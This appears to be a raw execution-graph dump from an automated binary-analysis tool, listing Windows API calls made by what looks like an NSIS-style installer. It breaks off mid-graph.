                                                                Dynamic/Decrypted Code Coverage:0%
                                                                Signature Coverage:16.3%
                                                                Total number of Nodes:1543
                                                                Total number of Limit Nodes:47
                                                                execution_graph 4874 401d44 4875 402bac 17 API calls 4874->4875 4876 401d52 SetWindowLongA 4875->4876 4877 402a5a 4876->4877 3865 401ec5 3873 402bac 3865->3873 3867 401ecb 3868 402bac 17 API calls 3867->3868 3869 401ed7 3868->3869 3870 401ee3 ShowWindow 3869->3870 3871 401eee EnableWindow 3869->3871 3872 402a5a 3870->3872 3871->3872 3876 40618a 3873->3876 3875 402bc1 3875->3867 3877 406197 3876->3877 3878 4063b9 3877->3878 3881 406393 lstrlenA 3877->3881 3884 40618a 10 API calls 3877->3884 3885 4062af GetSystemDirectoryA 3877->3885 3887 4062c2 GetWindowsDirectoryA 3877->3887 3889 40633c lstrcatA 3877->3889 3890 4062f6 SHGetSpecialFolderLocation 3877->3890 3891 40618a 10 API calls 3877->3891 3893 405fde 3877->3893 3898 4063d2 3877->3898 3907 406055 wsprintfA 3877->3907 3908 4060f7 lstrcpynA 3877->3908 3879 4063ce 3878->3879 3909 4060f7 lstrcpynA 3878->3909 3879->3875 3881->3877 3884->3881 3885->3877 3887->3877 3889->3877 3890->3877 3892 40630e SHGetPathFromIDListA CoTaskMemFree 3890->3892 3891->3877 3892->3877 3910 405f7d 3893->3910 3896 406012 RegQueryValueExA RegCloseKey 3897 406041 3896->3897 3897->3877 3905 4063de 3898->3905 3899 406446 3900 40644a CharPrevA 3899->3900 3902 406465 3899->3902 3900->3899 3901 40643b CharNextA 3901->3899 3901->3905 3902->3877 3904 406429 CharNextA 3904->3905 3905->3899 3905->3901 3905->3904 3906 406436 CharNextA 3905->3906 3914 405aba 3905->3914 3906->3901 3907->3877 3908->3877 3909->3879 3911 405f8c 3910->3911 3912 405f90 3911->3912 3913 405f95 RegOpenKeyExA 3911->3913 3912->3896 3912->3897 3913->3912 3915 405ac0 3914->3915 3916 405ad3 3915->3916 3917 405ac6 CharNextA 3915->3917 3916->3905 3917->3915 3918 401746 3924 402bce 3918->3924 3922 401754 3923 405cbf 2 API calls 3922->3923 3923->3922 3925 402bda 3924->3925 3926 40618a 17 API calls 3925->3926 3927 402bfb 3926->3927 3928 40174d 3927->3928 3929 4063d2 5 API calls 3927->3929 3930 405cbf 3928->3930 3929->3928 3931 405cca GetTickCount GetTempFileNameA 3930->3931 3932 405cfb 3931->3932 3933 405cf7 3931->3933 3932->3922 3933->3931 3933->3932 4878 4045c6 4879 4045d6 4878->4879 4880 4045fc 4878->4880 4885 40417b 4879->4885 4888 4041e2 4880->4888 4883 4045e3 SetDlgItemTextA 4883->4880 4886 40618a 17 API calls 4885->4886 4887 404186 SetDlgItemTextA 4886->4887 4887->4883 4889 4042a5 4888->4889 4890 4041fa GetWindowLongA 4888->4890 4890->4889 4891 40420f 4890->4891 4891->4889 4892 40423c GetSysColor 4891->4892 4893 40423f 4891->4893 4892->4893 4894 404245 SetTextColor 4893->4894 4895 40424f SetBkMode 4893->4895 4894->4895 4896 404267 GetSysColor 4895->4896 4897 40426d 4895->4897 4896->4897 4898 404274 SetBkColor 4897->4898 4899 40427e 4897->4899 4898->4899 4899->4889 4900 404291 DeleteObject 4899->4900 4901 404298 CreateBrushIndirect 4899->4901 4900->4901 4901->4889 4902 401947 4903 402bce 17 API calls 4902->4903 4904 40194e lstrlenA 4903->4904 4905 402620 4904->4905 3934 403348 SetErrorMode GetVersion 3935 403389 3934->3935 3938 40338f 3934->3938 3936 406500 5 API calls 3935->3936 3936->3938 4024 406492 GetSystemDirectoryA 3938->4024 3939 4033a5 lstrlenA 3939->3938 3940 4033b4 3939->3940 4027 406500 GetModuleHandleA 3940->4027 3943 406500 5 API calls 3944 4033c2 3943->3944 3945 406500 5 API calls 3944->3945 3946 4033ce #17 OleInitialize SHGetFileInfoA 3945->3946 4033 4060f7 lstrcpynA 3946->4033 3949 40341a GetCommandLineA 4034 4060f7 lstrcpynA 3949->4034 3951 40342c 3952 405aba CharNextA 3951->3952 3953 403455 CharNextA 3952->3953 3961 403465 3953->3961 3954 40352f 3955 403542 GetTempPathA 3954->3955 4035 403317 3955->4035 3957 40355a 3958 4035b4 DeleteFileA 3957->3958 3959 40355e GetWindowsDirectoryA lstrcatA 3957->3959 4045 402ea1 GetTickCount GetModuleFileNameA 3958->4045 3962 403317 12 API calls 3959->3962 3960 405aba CharNextA 3960->3961 3961->3954 3961->3960 3966 403531 3961->3966 3965 40357a 3962->3965 3964 4035c8 3967 40365e 3964->3967 3970 40364e 3964->3970 3974 405aba CharNextA 3964->3974 3965->3958 3969 40357e GetTempPathA lstrcatA SetEnvironmentVariableA SetEnvironmentVariableA 3965->3969 4130 4060f7 lstrcpynA 3966->4130 4147 403830 3967->4147 3972 403317 12 API calls 3969->3972 4073 40390a 3970->4073 3976 4035ac 3972->3976 3977 4035e3 3974->3977 3976->3958 3976->3967 3984 403629 3977->3984 3985 40368e 3977->3985 3978 403796 3981 403818 ExitProcess 3978->3981 3982 40379e GetCurrentProcess OpenProcessToken 3978->3982 3979 403678 4154 405813 3979->4154 3987 4037e9 3982->3987 3988 4037b9 LookupPrivilegeValueA AdjustTokenPrivileges 3982->3988 4131 405b7d 3984->4131 4158 40577e 3985->4158 3991 406500 5 API calls 3987->3991 3988->3987 3992 4037f0 3991->3992 3995 403805 ExitWindowsEx 3992->3995 3998 403811 3992->3998 3995->3981 3995->3998 3996 4036a4 lstrcatA 3997 4036af lstrcatA lstrcmpiA 3996->3997 3997->3967 4000 4036cb 3997->4000 4178 40140b 3998->4178 4001 4036d0 4000->4001 4002 4036d7 4000->4002 4161 4056e4 CreateDirectoryA 4001->4161 4166 405761 CreateDirectoryA 4002->4166 4004 403643 4146 4060f7 lstrcpynA 4004->4146 4009 4036dc SetCurrentDirectoryA 4010 4036f6 4009->4010 4011 4036eb 4009->4011 4170 4060f7 lstrcpynA 4010->4170 4169 4060f7 lstrcpynA 4011->4169 4014 40618a 17 API calls 4015 403735 DeleteFileA 4014->4015 4016 403742 CopyFileA 4015->4016 4021 403704 4015->4021 4016->4021 4017 40378a 4019 405ed6 36 API calls 4017->4019 4019->3967 4020 40618a 17 API calls 4020->4021 4021->4014 4021->4017 4021->4020 4023 403776 CloseHandle 4021->4023 4171 405ed6 MoveFileExA 4021->4171 4175 405796 CreateProcessA 4021->4175 4023->4021 4025 4064b4 wsprintfA LoadLibraryExA 4024->4025 4025->3939 4028 406526 GetProcAddress 4027->4028 4029 40651c 4027->4029 4030 4033bb 4028->4030 4031 406492 3 API calls 4029->4031 4030->3943 4032 406522 4031->4032 4032->4028 4032->4030 4033->3949 4034->3951 4036 4063d2 5 API calls 4035->4036 4037 403323 4036->4037 4038 40332d 4037->4038 4181 405a8f lstrlenA CharPrevA 4037->4181 4038->3957 4041 405761 2 API calls 4042 40333b 4041->4042 4043 405cbf 2 API calls 4042->4043 4044 403346 4043->4044 4044->3957 4184 405c90 GetFileAttributesA CreateFileA 4045->4184 4047 402ee1 4048 402ef1 4047->4048 4185 4060f7 lstrcpynA 4047->4185 4048->3964 4050 402f07 4186 405ad6 lstrlenA 4050->4186 4054 402f18 GetFileSize 4069 403012 4054->4069 4072 402f2f 4054->4072 4056 40301b 4056->4048 4058 40304b GlobalAlloc 4056->4058 4226 403300 SetFilePointer 4056->4226 4202 403300 SetFilePointer 4058->4202 4059 40307e 4063 402e3d 6 API calls 4059->4063 4062 403066 4203 4030d8 4062->4203 4063->4048 4064 403034 4066 4032ea ReadFile 4064->4066 4068 40303f 4066->4068 4067 402e3d 6 API calls 4067->4072 4068->4048 4068->4058 4191 402e3d 4069->4191 4070 403072 4070->4048 4070->4070 4071 4030af SetFilePointer 4070->4071 4071->4048 4072->4048 4072->4059 4072->4067 4072->4069 4223 4032ea 4072->4223 4074 406500 5 API calls 4073->4074 4075 40391e 4074->4075 4076 403924 4075->4076 4077 403936 4075->4077 4255 406055 wsprintfA 4076->4255 4078 405fde 3 API calls 4077->4078 4079 403961 4078->4079 4081 40397f lstrcatA 4079->4081 4083 405fde 3 API calls 4079->4083 4082 403934 4081->4082 4247 403bcf 4082->4247 4083->4081 4086 405b7d 18 API calls 4088 4039b1 4086->4088 4087 403a3a 4089 405b7d 18 API calls 4087->4089 4088->4087 4090 405fde 3 API calls 4088->4090 4091 403a40 4089->4091 4092 4039dd 4090->4092 4093 403a50 LoadImageA 4091->4093 4094 40618a 17 API calls 4091->4094 4092->4087 4098 4039f9 lstrlenA 4092->4098 4101 405aba CharNextA 4092->4101 4095 403af6 4093->4095 4096 403a77 RegisterClassA 4093->4096 4094->4093 4097 40140b 2 API calls 4095->4097 4099 403aad SystemParametersInfoA CreateWindowExA 4096->4099 4129 403b00 4096->4129 4100 403afc 4097->4100 4102 403a07 lstrcmpiA 4098->4102 4103 403a2d 4098->4103 4099->4095 4108 403bcf 18 API calls 4100->4108 4100->4129 4106 4039f7 4101->4106 4102->4103 4104 403a17 GetFileAttributesA 4102->4104 4105 405a8f 3 API calls 4103->4105 4107 403a23 4104->4107 4109 403a33 4105->4109 4106->4098 4107->4103 4110 405ad6 2 API calls 4107->4110 4111 403b0d 4108->4111 4256 4060f7 lstrcpynA 4109->4256 4110->4103 4113 403b19 ShowWindow 4111->4113 4114 403b9c 4111->4114 4116 406492 3 API calls 4113->4116 4257 4052f0 OleInitialize 4114->4257 4118 403b31 4116->4118 4117 403ba2 4119 403ba6 4117->4119 4120 403bbe 4117->4120 4121 403b3f GetClassInfoA 4118->4121 4123 406492 3 API calls 4118->4123 4126 40140b 2 API calls 4119->4126 4119->4129 4122 40140b 2 API calls 4120->4122 4124 403b53 GetClassInfoA RegisterClassA 4121->4124 4125 403b69 DialogBoxParamA 4121->4125 4122->4129 4123->4121 4124->4125 4127 40140b 2 API calls 4125->4127 4126->4129 4128 403b91 4127->4128 4128->4129 4129->3967 4130->3955 4275 4060f7 lstrcpynA 4131->4275 4133 405b8e 4276 405b28 CharNextA CharNextA 4133->4276 4136 403634 4136->3967 4145 4060f7 lstrcpynA 4136->4145 4137 4063d2 5 API calls 4140 405ba4 4137->4140 4138 405bcf lstrlenA 4139 405bda 4138->4139 4138->4140 4142 405a8f 3 API calls 4139->4142 4140->4136 4140->4138 4144 405ad6 2 API calls 4140->4144 4282 40646b FindFirstFileA 4140->4282 4143 405bdf GetFileAttributesA 4142->4143 4143->4136 4144->4138 4145->4004 4146->3970 4148 403848 4147->4148 4149 40383a CloseHandle 4147->4149 4285 403875 4148->4285 4149->4148 4155 405828 4154->4155 4156 403686 ExitProcess 4155->4156 4157 40583c MessageBoxIndirectA 4155->4157 4157->4156 4159 406500 5 API calls 4158->4159 4160 403693 lstrcatA 4159->4160 4160->3996 4160->3997 4162 4036d5 4161->4162 4163 405735 GetLastError 4161->4163 4162->4009 4163->4162 4164 405744 SetFileSecurityA 4163->4164 4164->4162 4165 40575a GetLastError 4164->4165 4165->4162 4167 405771 4166->4167 4168 405775 GetLastError 4166->4168 4167->4009 4168->4167 4169->4010 4170->4021 4172 405ef7 4171->4172 4173 405eea 4171->4173 4172->4021 4342 405d66 4173->4342 4176 4057d5 4175->4176 4177 4057c9 CloseHandle 4175->4177 4176->4021 4177->4176 4179 401389 2 API calls 4178->4179 4180 401420 4179->4180 4180->3981 4182 403335 4181->4182 4183 405aa9 lstrcatA 4181->4183 4182->4041 4183->4182 4184->4047 4185->4050 4187 405ae3 4186->4187 4188 402f0d 4187->4188 4189 405ae8 CharPrevA 4187->4189 4190 4060f7 lstrcpynA 4188->4190 4189->4187 4189->4188 4190->4054 4192 402e46 4191->4192 4193 402e5e 4191->4193 4194 402e56 4192->4194 4195 402e4f DestroyWindow 4192->4195 4196 402e66 4193->4196 4197 402e6e GetTickCount 4193->4197 4194->4056 4195->4194 4227 40653c 4196->4227 4199 402e7c CreateDialogParamA ShowWindow 4197->4199 4200 402e9f 4197->4200 4199->4200 4200->4056 4202->4062 4204 4030ee 4203->4204 4205 40311c 4204->4205 4233 403300 SetFilePointer 4204->4233 4207 4032ea ReadFile 4205->4207 4208 403127 4207->4208 4209 403283 4208->4209 4210 403139 GetTickCount 4208->4210 4212 40326d 4208->4212 4211 4032c5 4209->4211 4216 403287 4209->4216 4210->4212 4219 403188 4210->4219 4214 4032ea ReadFile 4211->4214 4212->4070 4213 4032ea ReadFile 4213->4219 4214->4212 4215 4032ea ReadFile 4215->4216 4216->4212 4216->4215 4217 405d37 WriteFile 4216->4217 4217->4216 4218 4031de GetTickCount 4218->4219 4219->4212 4219->4213 4219->4218 4220 403203 MulDiv wsprintfA 4219->4220 4231 405d37 WriteFile 4219->4231 4234 40521e 4220->4234 4245 405d08 ReadFile 4223->4245 4226->4064 4228 406559 PeekMessageA 4227->4228 4229 402e6c 4228->4229 4230 40654f DispatchMessageA 4228->4230 4229->4056 4230->4228 4232 405d55 4231->4232 4232->4219 4233->4205 4235 405239 4234->4235 4244 4052dc 4234->4244 4236 405256 lstrlenA 4235->4236 4237 40618a 17 API calls 4235->4237 4238 405264 lstrlenA 4236->4238 4239 40527f 4236->4239 4237->4236 4240 405276 lstrcatA 4238->4240 4238->4244 4241 405292 4239->4241 4242 405285 SetWindowTextA 4239->4242 4240->4239 4243 405298 SendMessageA SendMessageA SendMessageA 4241->4243 4241->4244 4242->4241 4243->4244 4244->4219 4246 4032fd 4245->4246 4246->4072 4248 403be3 4247->4248 4264 406055 wsprintfA 4248->4264 4250 403c54 4265 403c88 4250->4265 4252 40398f 4252->4086 4253 403c59 4253->4252 4254 40618a 17 API calls 4253->4254 4254->4253 4255->4082 4256->4087 4268 4041c7 4257->4268 4259 405313 4263 40533a 4259->4263 4271 401389 4259->4271 4260 4041c7 SendMessageA 4261 40534c OleUninitialize 4260->4261 4261->4117 4263->4260 4264->4250 4266 40618a 17 API calls 4265->4266 4267 403c96 SetWindowTextA 4266->4267 4267->4253 4269 4041d0 SendMessageA 4268->4269 4270 4041df 4268->4270 4269->4270 4270->4259 4273 401390 4271->4273 4272 4013fe 4272->4259 4273->4272 4274 4013cb MulDiv SendMessageA 4273->4274 4274->4273 4275->4133 4277 405b43 4276->4277 4279 405b53 4276->4279 4277->4279 4280 405b4e CharNextA 4277->4280 4278 405b73 4278->4136 4278->4137 4279->4278 4281 405aba CharNextA 4279->4281 4280->4278 4281->4279 4283 406481 FindClose 4282->4283 4284 40648c 4282->4284 4283->4284 4284->4140 4286 403883 4285->4286 4287 403888 FreeLibrary GlobalFree 4286->4287 4288 40384d 4286->4288 4287->4287 4287->4288 4289 4058bf 4288->4289 4290 405b7d 18 API calls 4289->4290 4291 4058df 4290->4291 4292 4058e7 DeleteFileA 4291->4292 4293 4058fe 4291->4293 4294 403667 OleUninitialize 4292->4294 4295 405a2c 4293->4295 4329 4060f7 lstrcpynA 4293->4329 4294->3978 4294->3979 4295->4294 4300 40646b 2 API calls 4295->4300 4297 405924 4298 405937 4297->4298 4299 40592a lstrcatA 4297->4299 4302 405ad6 2 API calls 4298->4302 4301 40593d 4299->4301 4303 405a50 4300->4303 4304 40594b lstrcatA 4301->4304 4306 405956 lstrlenA FindFirstFileA 4301->4306 4302->4301 4303->4294 4305 405a54 4303->4305 4304->4306 4307 405a8f 3 API calls 4305->4307 4306->4295 4311 40597a 4306->4311 4309 405a5a 4307->4309 4308 405aba CharNextA 4308->4311 4310 405877 5 API calls 4309->4310 4312 405a66 4310->4312 4311->4308 4316 405a0b FindNextFileA 4311->4316 4325 4059cc 4311->4325 4330 4060f7 lstrcpynA 4311->4330 4313 405a80 4312->4313 4314 405a6a 4312->4314 4315 40521e 24 API calls 4313->4315 4314->4294 4319 40521e 24 API calls 4314->4319 4315->4294 4316->4311 4318 405a23 FindClose 4316->4318 4318->4295 4320 405a77 4319->4320 4322 405ed6 36 API calls 4320->4322 4324 405a7e 4322->4324 4323 4058bf 60 API calls 4323->4325 4324->4294 4325->4316 4325->4323 4326 40521e 24 API calls 4325->4326 4327 40521e 24 API calls 4325->4327 4328 405ed6 36 API calls 4325->4328 4331 405877 4325->4331 4326->4316 4327->4325 4328->4325 4329->4297 4330->4311 4339 405c6b GetFileAttributesA 4331->4339 4334 4058a4 4334->4325 4335 405892 RemoveDirectoryA 4337 4058a0 4335->4337 4336 40589a DeleteFileA 4336->4337 4337->4334 4338 4058b0 SetFileAttributesA 4337->4338 4338->4334 4340 405883 4339->4340 4341 405c7d SetFileAttributesA 4339->4341 4340->4334 4340->4335 4340->4336 4341->4340 4343 405db2 GetShortPathNameA 4342->4343 4344 405d8c 4342->4344 4345 405ed1 4343->4345 4346 405dc7 4343->4346 4369 405c90 GetFileAttributesA CreateFileA 4344->4369 4345->4172 4346->4345 4348 405dcf wsprintfA 4346->4348 4351 40618a 17 API calls 4348->4351 4349 405d96 CloseHandle GetShortPathNameA 4349->4345 4350 405daa 4349->4350 4350->4343 4350->4345 4352 405df7 4351->4352 4370 405c90 GetFileAttributesA CreateFileA 4352->4370 4354 405e04 4354->4345 4355 405e13 GetFileSize GlobalAlloc 4354->4355 4356 405e35 4355->4356 4357 405eca CloseHandle 4355->4357 4358 405d08 ReadFile 4356->4358 4357->4345 4359 405e3d 4358->4359 4359->4357 4371 405bf5 lstrlenA 4359->4371 4362 405e54 lstrcpyA 4365 405e76 4362->4365 4363 405e68 4364 405bf5 4 API calls 4363->4364 4364->4365 4366 405ead SetFilePointer 4365->4366 4367 405d37 WriteFile 4366->4367 4368 405ec3 GlobalFree 4367->4368 4368->4357 4369->4349 4370->4354 4372 405c36 lstrlenA 4371->4372 4373 405c3e 4372->4373 4374 405c0f lstrcmpiA 4372->4374 4373->4362 4373->4363 4374->4373 4375 405c2d CharNextA 4374->4375 4375->4372 4906 4038c8 4907 4038d3 4906->4907 4908 4038d7 4907->4908 4909 4038da GlobalAlloc 4907->4909 4909->4908 4913 401fcb 4914 402bce 17 API calls 4913->4914 4915 401fd2 4914->4915 4916 40646b 2 API calls 4915->4916 4917 401fd8 4916->4917 4919 401fea 4917->4919 4920 406055 wsprintfA 4917->4920 4920->4919 4397 4014d6 4398 402bac 17 API calls 4397->4398 4399 4014dc Sleep 4398->4399 4401 402a5a 4399->4401 4414 401759 4415 402bce 17 API calls 4414->4415 4416 401760 4415->4416 4417 401786 4416->4417 4418 40177e 4416->4418 4455 4060f7 lstrcpynA 4417->4455 4454 4060f7 lstrcpynA 4418->4454 4421 401791 4423 405a8f 3 API calls 4421->4423 4422 401784 4425 4063d2 5 API calls 4422->4425 4424 401797 lstrcatA 4423->4424 4424->4422 4429 4017a3 4425->4429 4426 40646b 2 API calls 4426->4429 4427 4017e4 4430 405c6b 2 API calls 4427->4430 4429->4426 4429->4427 4431 4017ba CompareFileTime 4429->4431 4432 40187e 4429->4432 4437 4060f7 lstrcpynA 4429->4437 4440 40618a 17 API calls 4429->4440 4449 405813 MessageBoxIndirectA 4429->4449 4452 401855 4429->4452 4453 405c90 GetFileAttributesA CreateFileA 4429->4453 4430->4429 4431->4429 4433 40521e 24 API calls 4432->4433 4435 401888 4433->4435 4434 40521e 24 API calls 4450 40186a 4434->4450 4436 4030d8 31 API calls 4435->4436 4438 40189b 4436->4438 4437->4429 4439 4018af SetFileTime 4438->4439 4441 4018c1 CloseHandle 4438->4441 4439->4441 4440->4429 4442 4018d2 4441->4442 4441->4450 4443 4018d7 4442->4443 4444 4018ea 4442->4444 4445 40618a 17 API calls 4443->4445 4446 40618a 17 API calls 4444->4446 4447 4018df lstrcatA 4445->4447 4448 4018f2 4446->4448 4447->4448 4448->4450 4451 405813 MessageBoxIndirectA 4448->4451 4449->4429 4451->4450 4452->4434 4452->4450 4453->4429 4454->4422 4455->4421 4921 401959 4922 402bac 17 API calls 4921->4922 4923 401960 4922->4923 4924 402bac 17 API calls 4923->4924 4925 40196d 4924->4925 4926 402bce 17 API calls 4925->4926 4927 401984 lstrlenA 4926->4927 4929 401994 4927->4929 4928 4019d4 4929->4928 4933 4060f7 lstrcpynA 4929->4933 4931 4019c4 4931->4928 4932 4019c9 lstrlenA 4931->4932 4932->4928 4933->4931 4934 701a1000 4937 701a101b 4934->4937 4944 701a14bb 4937->4944 4939 701a1020 4940 701a1027 GlobalAlloc 4939->4940 4941 701a1024 4939->4941 4940->4941 4942 701a14e2 3 API calls 4941->4942 4943 701a1019 4942->4943 4945 701a14c1 4944->4945 4946 701a14c7 4945->4946 4947 701a14d3 GlobalFree 4945->4947 4946->4939 4947->4939 4948 40535c 4949 405507 4948->4949 4950 40537e GetDlgItem GetDlgItem GetDlgItem 4948->4950 4952 405537 4949->4952 4953 40550f GetDlgItem CreateThread CloseHandle 4949->4953 4993 4041b0 SendMessageA 4950->4993 4954 405586 4952->4954 4955 40554d ShowWindow ShowWindow 4952->4955 4957 405565 4952->4957 4953->4952 4963 4041e2 8 API calls 4954->4963 4995 4041b0 SendMessageA 4955->4995 4956 4055c0 4956->4954 4966 4055cd SendMessageA 4956->4966 4957->4956 4961 405575 4957->4961 4962 405599 ShowWindow 4957->4962 4958 4053ee 4959 4053f5 GetClientRect GetSystemMetrics SendMessageA SendMessageA 4958->4959 4964 405463 4959->4964 4965 405447 SendMessageA SendMessageA 4959->4965 4996 404154 4961->4996 4969 4055b9 4962->4969 4970 4055ab 4962->4970 4968 405592 4963->4968 4971 405476 4964->4971 4972 405468 SendMessageA 4964->4972 4965->4964 4966->4968 4973 4055e6 CreatePopupMenu 4966->4973 4975 404154 SendMessageA 4969->4975 4974 40521e 24 API calls 4970->4974 4977 40417b 18 API calls 4971->4977 4972->4971 4976 40618a 17 API calls 4973->4976 4974->4969 4975->4956 4978 4055f6 AppendMenuA 4976->4978 4979 405486 4977->4979 4980 405614 GetWindowRect 4978->4980 4981 405627 TrackPopupMenu 4978->4981 4982 4054c3 GetDlgItem SendMessageA 4979->4982 4983 40548f ShowWindow 4979->4983 4980->4981 4981->4968 4984 405643 4981->4984 4982->4968 4986 4054ea SendMessageA SendMessageA 4982->4986 4985 4054a5 ShowWindow 4983->4985 4988 4054b2 4983->4988 4987 405662 SendMessageA 4984->4987 4985->4988 4986->4968 4987->4987 4989 40567f OpenClipboard EmptyClipboard GlobalAlloc GlobalLock 4987->4989 4994 4041b0 SendMessageA 4988->4994 4991 4056a1 SendMessageA 4989->4991 4991->4991 4992 4056c3 GlobalUnlock SetClipboardData CloseClipboard 4991->4992 4992->4968 4993->4958 4994->4982 4995->4957 4997 404161 SendMessageA 4996->4997 4998 40415b 4996->4998 4997->4954 4998->4997 4999 40275d 5000 402763 4999->5000 5001 402a5a 5000->5001 5002 40276b FindClose 5000->5002 5002->5001 5003 401a5e 5004 402bac 17 API calls 5003->5004 5005 401a67 5004->5005 5006 402bac 17 API calls 5005->5006 5007 401a0e 5006->5007 5008 40495e 5009 40498a 5008->5009 5010 40496e 5008->5010 5012 404990 SHGetPathFromIDListA 5009->5012 5013 4049bd 5009->5013 5019 4057f7 GetDlgItemTextA 5010->5019 5015 4049a0 5012->5015 5016 4049a7 SendMessageA 5012->5016 5014 40497b SendMessageA 5014->5009 5017 40140b 2 API calls 5015->5017 5016->5013 5017->5016 5019->5014 5020 4029de 5021 406500 5 API calls 5020->5021 5022 4029e5 5021->5022 5023 402bce 17 API calls 5022->5023 5024 4029ee 5023->5024 5026 402a2a 5024->5026 5030 40614a 5024->5030 5027 4029fc 5027->5026 5034 406134 5027->5034 5031 406155 5030->5031 5032 406178 IIDFromString 5031->5032 5033 406171 5031->5033 5032->5027 5033->5027 5037 406119 WideCharToMultiByte 5034->5037 5036 402a1d CoTaskMemFree 5036->5026 5037->5036 5038 4027df 5039 402bce 17 API calls 5038->5039 5041 4027ed 5039->5041 5040 402803 5043 405c6b 2 API calls 5040->5043 5041->5040 5042 402bce 17 API calls 5041->5042 5042->5040 5044 402809 5043->5044 5066 405c90 GetFileAttributesA CreateFileA 5044->5066 5046 402816 5047 402822 GlobalAlloc 5046->5047 5048 4028bf 5046->5048 5051 4028b6 CloseHandle 5047->5051 5052 40283b 5047->5052 5049 4028c7 DeleteFileA 5048->5049 5050 4028da 5048->5050 5049->5050 5051->5048 5067 403300 SetFilePointer 5052->5067 5054 402841 5055 4032ea ReadFile 5054->5055 5056 40284a GlobalAlloc 5055->5056 5057 402894 5056->5057 5058 40285a 5056->5058 5060 405d37 WriteFile 5057->5060 5059 4030d8 31 API calls 5058->5059 5065 402867 5059->5065 5061 4028a0 GlobalFree 5060->5061 5062 4030d8 31 API calls 5061->5062 5064 4028b3 5062->5064 5063 40288b GlobalFree 5063->5057 5064->5051 5065->5063 5066->5046 5067->5054 4670 4023e0 4671 402bce 17 API calls 4670->4671 4672 4023f1 4671->4672 4673 402bce 17 API calls 4672->4673 4674 4023fa 4673->4674 4675 402bce 17 API calls 4674->4675 4676 402404 GetPrivateProfileStringA 4675->4676 5068 4028e0 5069 402bac 17 API calls 5068->5069 5070 4028e6 5069->5070 5071 402925 5070->5071 5072 40290e 5070->5072 5077 4027bf 5070->5077 5075 40293f 5071->5075 5076 40292f 5071->5076 5073 402922 5072->5073 5074 402913 5072->5074 5083 406055 wsprintfA 5073->5083 5082 4060f7 lstrcpynA 5074->5082 5079 40618a 17 API calls 5075->5079 5078 402bac 17 API calls 5076->5078 5078->5077 5079->5077 5082->5077 5083->5077 5084 701a1638 5085 701a1667 5084->5085 5086 701a1a98 18 API calls 5085->5086 5087 701a166e 5086->5087 5088 701a1681 5087->5088 5089 701a1675 5087->5089 5091 701a168b 5088->5091 5092 701a16a8 5088->5092 5090 701a1266 2 API calls 5089->5090 5098 701a167f 5090->5098 5095 701a14e2 3 API calls 5091->5095 5093 701a16ae 5092->5093 5094 701a16d2 5092->5094 5096 701a1559 3 API calls 5093->5096 5097 701a14e2 3 API calls 5094->5097 5099 701a1690 5095->5099 5100 701a16b3 5096->5100 5097->5098 5101 701a1559 3 API calls 5099->5101 5103 701a1266 2 API calls 5100->5103 5102 701a1696 5101->5102 5104 701a1266 2 API calls 5102->5104 5105 701a16b9 GlobalFree 5103->5105 5106 701a169c GlobalFree 5104->5106 5105->5098 5107 701a16cd GlobalFree 5105->5107 5106->5098 5107->5098 5108 401b63 5109 402bce 17 API calls 5108->5109 5110 401b6a 5109->5110 5111 402bac 17 API calls 5110->5111 5112 401b73 wsprintfA 5111->5112 5113 402a5a 5112->5113 5114 401d65 5115 401d78 GetDlgItem 5114->5115 5116 401d6b 5114->5116 5118 401d72 5115->5118 5117 402bac 17 API calls 5116->5117 5117->5118 5119 401db9 GetClientRect LoadImageA SendMessageA 5118->5119 5120 402bce 17 API calls 5118->5120 5122 401e1a 5119->5122 5124 401e26 5119->5124 5120->5119 5123 401e1f DeleteObject 5122->5123 5122->5124 5123->5124 5125 4042e6 5126 404408 5125->5126 5127 4042fc 5125->5127 5128 404477 5126->5128 5132 404541 5126->5132 5135 40444c GetDlgItem SendMessageA 5126->5135 5129 40417b 18 API calls 5127->5129 5130 404481 GetDlgItem 5128->5130 5128->5132 5131 404352 5129->5131 5133 404497 5130->5133 5134 4044ff 5130->5134 5136 40417b 18 API calls 5131->5136 5137 4041e2 8 API calls 5132->5137 5133->5134 5142 4044bd SendMessageA LoadCursorA SetCursor 5133->5142 5134->5132 5138 404511 5134->5138 5158 40419d EnableWindow 5135->5158 5140 40435f CheckDlgButton 5136->5140 5141 40453c 5137->5141 5143 404517 SendMessageA 5138->5143 5144 404528 5138->5144 5156 40419d EnableWindow 5140->5156 5162 40458a 5142->5162 5143->5144 5144->5141 5148 40452e SendMessageA 5144->5148 5145 404472 5159 404566 5145->5159 5148->5141 5150 40437d GetDlgItem 5157 4041b0 SendMessageA 5150->5157 5153 404393 SendMessageA 5154 4043b1 GetSysColor 5153->5154 5155 4043ba SendMessageA SendMessageA lstrlenA SendMessageA SendMessageA 5153->5155 5154->5155 5155->5141 5156->5150 5157->5153 5158->5145 5160 404574 5159->5160 5161 404579 SendMessageA 5159->5161 5160->5161 5161->5128 5165 4057d9 ShellExecuteExA 5162->5165 5164 4044f0 LoadCursorA SetCursor 5164->5134 5165->5164 5166 701a103d 5167 701a101b 5 API calls 5166->5167 5168 701a1056 5167->5168 4718 40166a 4719 402bce 17 API calls 4718->4719 4720 401671 4719->4720 4721 402bce 17 API calls 4720->4721 4722 40167a 4721->4722 4723 402bce 17 API calls 4722->4723 4724 401683 MoveFileA 4723->4724 4725 401696 4724->4725 4731 40168f 4724->4731 4727 40646b 2 API calls 4725->4727 4729 4022e2 4725->4729 4726 401423 24 API calls 4726->4729 4728 4016a5 4727->4728 4728->4729 4730 405ed6 36 API calls 4728->4730 4730->4731 4731->4726 4732 40216b 4733 402bce 17 API calls 4732->4733 4734 402172 4733->4734 4735 402bce 17 API calls 4734->4735 4736 40217c 4735->4736 4737 402bce 17 API calls 4736->4737 4738 402186 4737->4738 4739 402bce 17 API calls 4738->4739 4740 402193 4739->4740 4741 402bce 17 API calls 4740->4741 4742 40219d 4741->4742 4743 4021df CoCreateInstance 4742->4743 4744 402bce 17 API calls 4742->4744 4747 4021fe 4743->4747 4749 4022ac 4743->4749 4744->4743 4745 401423 24 API calls 4746 4022e2 4745->4746 4748 40228c MultiByteToWideChar 4747->4748 4747->4749 4748->4749 4749->4745 4749->4746 5169 4022eb 5170 402bce 17 API calls 5169->5170 5171 4022f1 5170->5171 5172 402bce 17 API calls 5171->5172 5173 4022fa 5172->5173 5174 402bce 17 API calls 5173->5174 5175 402303 5174->5175 5176 40646b 2 API calls 5175->5176 5177 40230c 5176->5177 5178 40231d lstrlenA lstrlenA 5177->5178 5183 402310 5177->5183 5180 40521e 24 API calls 5178->5180 5179 40521e 24 API calls 5182 402318 5179->5182 5181 402359 SHFileOperationA 5180->5181 5181->5182 5181->5183 5183->5179 5183->5182 4759 40266d 4760 402bac 17 API calls 